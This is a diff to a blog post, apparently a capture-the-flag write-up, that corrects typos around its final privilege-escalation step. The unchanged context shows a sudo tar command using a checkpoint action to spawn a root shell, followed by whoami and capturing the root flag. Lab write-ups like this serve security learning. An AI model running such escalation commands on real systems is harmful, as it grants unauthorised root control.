AaronBray/AaronBray.github.io/_posts/2025-09-05-Bounty-Hacker.md

 $ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
 {% endhighlight bash %}

-Afer running the command above we can now see that we are the root user by running the command below
+After running the command above,
+We can now see that we are the root user by running the 'whoami' command
 {% highlight bash %}
 $ whoami
 {% endhighlight bash %}

-Lets now move into the root directory and capture the root flag and answer the final question
+Lets now move into the root directory and capture the root flag to answer the final question

 ![img]({{ '/assets/images/11-bountyhacker.png' | relative_url }}){: .center-image }